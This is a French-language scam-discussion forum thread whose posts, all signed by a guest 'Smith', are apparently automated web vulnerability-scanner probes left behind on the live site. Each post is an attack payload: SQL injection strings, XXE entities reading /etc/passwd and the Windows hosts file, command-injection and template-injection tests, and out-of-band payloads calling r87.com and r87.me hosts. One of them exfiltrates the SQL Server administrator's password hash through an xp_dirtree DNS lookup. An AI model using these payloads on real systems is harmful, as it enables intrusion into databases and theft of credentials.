Accueil › Forums › Les Arnaques › Autres › 3
- Ce sujet est vide.
-
AuteurMessages
-
-
Smith
Invité3
-
Smith
Invité3
-
Smith
Invitéhttp://example.com/?
ns: netsparker056650=vuln -
Smith
Invitéphp://filter//resource=http://r87.com/n?.php
-
Smith
Invitér87.com/n
-
Smith
Invité-1 OR 1=1
-
Smith
Invité-1′ OR 1=1 OR ‘1’=’1
-
Smith
Invité-1′ OR 1=1 OR ‘ns’=’ns
-
Smith
Invité-1″ OR 1=1 OR « 1 »= »1
-
Smith
Invité<?xml version= »1.0″?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM « file:///C:/Windows/System32/drivers/etc/hosts »>]><ns>&lfi;</ns>
-
Smith
Invité<?xml version= »1.0″?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM « file:///etc/passwd »>]><ns>&lfi;</ns>
-
Smith
Invité‘;sleep(25000);ns();’ /* aadf2b1e-dd7a-44c7-af67-c7870744f950 */
-
Smith
Invité%27%3bsleep%2825000%29%3bns%28%29%3b%27 /* f5518207-b987-484a-97f2-161998a936fe */
-
Smith
Invitéubuirzlatck5ct3mtnizv1bcvlvuw-keit-ckr_wxxa.r87.me
-
Smith
Invité//ubuirzlatcpzkumxahskhjfeekbwpderkqfmn02xvgg.r87.me
-
Smith
Invitéphp://filter//resource=http://ubuirzlatcperls4dndzdrjomwwbxdiqdsrhc2nndyt.r87.me/p/
-
Smith
Invitéubuirzlatc4gczojpncai1ld540yz-voamaj1_npd17.r87.me/p/
-
Smith
Invité{{268409241-65582}}
-
Smith
Invité=268409241-87376
-
Smith
Invité‘ »/$[].>
-
Smith
Invité<#assign x=268409241 – 39624>
${x?string[« 0 »]} -
Smith
Invité‘& ping -n 25 127.0.0.1 &
-
Smith
Invité@(268409241-48657)
-
Smith
Invitéping -n 25 127.0.0.1 &
-
Smith
Invité« &ping -w 25 127.0.0.1 & »
-
Smith
Invité‘&ping -w 25 127.0.0.1 &’
-
Smith
Invitéping -w 25 127.0.0.1 &
-
Smith
Invitéping -n 25 127.0.0.1
-
Smith
Invitéping -w 25 127.0.0.1
-
Smith
Invité« & SET /A 0xFFF9999-62076 &
-
Smith
Invité‘& SET /A 0xFFF9999-91149 &
-
Smith
Invité& SET /A 0xFFF9999-71378 &
-
Smith
InvitéSET /A 0xFFF9999-23090 &
-
Smith
InvitéSET /A 0xFFF9999-76449
-
Smith
Invité| SET /A 0xFFF9999-4782
-
Smith
Invité1″;expr 268409241 – 93266; »
-
Smith
Invité1′;expr 268409241 – 90444;’
-
Smith
Invité1;expr 268409241 – 98912;x
-
Smith
Invitéexpr 268409241 – 89495;
-
Smith
Invitéexpr 268409241 – 70893
-
Smith
Invité<!–#exec cmd= »expr 268409241 – 46510″–>
-
Smith
Invité|expr${IFS}268409241${IFS}-${IFS}24785
-
Smith
Invité%27
-
Smith
Invité(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
-
Smith
Invité‘+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +’
-
Smith
Invitéconvert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
-
Smith
Invité‘AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or ‘1’=’
-
Smith
Invité-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
-
Smith
Invité-1′ and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+’
-
Smith
Invité-1″ and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+ »
-
Smith
Invitéexec(‘xp_dirtree »\\ubuirzlatc8novrnu2kcparnvl9fnv-zjqrnbbz8’+’ce8.r87.me’+’\c$\a »’)
-
Smith
Invitédeclare @h varchar(999)select @h=’1’+substring(name+’-‘+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+’.ubuirzlatcs58nuv01bh4g2ko5lqluzqhs5jgjmv’+’mse.r87.me’ from sys.sql_logins WHERE principal_id=1;exec(‘xp_dirtree »\\’+@h+’\c$ »’)
-
Smith
Invité(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
-
Smith
Invitéresponse.write(268409241-3838)’
-
Smith
Invitécast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
-
Smith
Invité1) exec(‘xp_dirtree »\\ubuirzlatcegvjk8mdhkxdy-9cmollnavpxeorfu’+’mdw.r87.me’+’\c$\a »’)–
-
Smith
Invité1′)exec(‘xp_dirtree »\\ubuirzlatc5o_bajulqk5efkczeo1dadbhefx2zx’+’1a4.r87.me’+’\c$\a »’)–
-
Smith
Invité‘||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||’
-
Smith
Invité1))exec(‘xp_dirtree »\\ubuirzlatcztrt4o3dgvloogfrkpbo2wxhxvyqhr’+’g2k.r87.me’+’\c$\a »’)–
-
Smith
Invité1′))exec(‘xp_dirtree »\\ubuirzlatcx19ezf_svchdce-09r533l96hgaiaw’+’qke.r87.me’+’\c$\a »’)–
-
Smith
Invitésyscolumns WHERE 2>3;exec(‘xp_dirtree »\\ubuirzlatct673t5tdwvx2dcehtx2fjthlunwspg’+’b8s.r87.me’+’\c$\a »’)–
-
Smith
InvitéDECLARE @q varchar(999),@r nvarchar(999)SET @q = ‘SELECT * FROM OPENROWSET( »SQLOLEDB », »@ »; »a »; »1 », »SELECT 1 »)’SET @r=replace(@q,’@’,’ubuirzlatcqyo2bcx1f7al_5fj0bom6q3yw_mo-a’+’wr8.r87.me’)exec sp_executesql @r
-
Smith
Invité<% response.write(268409241-1179) %>
-
Smith
Invité1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = ‘SELECT * FROM OPENROWSET( »SQLOLEDB », »@ »; »a »; »1 », »SELECT 1 »)’SET @r=replace(@q,’@’,’ubuirzlatcljnwl_ec6yviq-dbbiq_bvq-awlqsk’+’duy.r87.me’)exec sp_executesql @r–
-
Smith
InvitéNSFTW
-
Smith
InvitéSELECT dblink_connect(‘host=ubuirzlatc9mam4–jp7ya9fkvidh4jqrraca5dj’||’0d0.r87.me user=a password=a connect_timeout=2’)
-
Smith
Invitédblink_connect(‘host=ubuirzlatc67cls4qmhhtyg85cijufabkydn2_l6’||’htm.r87.me user=a password=a connect_timeout=2’)
-
Smith
Invité‘+NSFTW+’
-
Smith
Invité‘+print(int)0xFFF9999-89951+’
-
Smith
Invité(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
-
-
AuteurMessages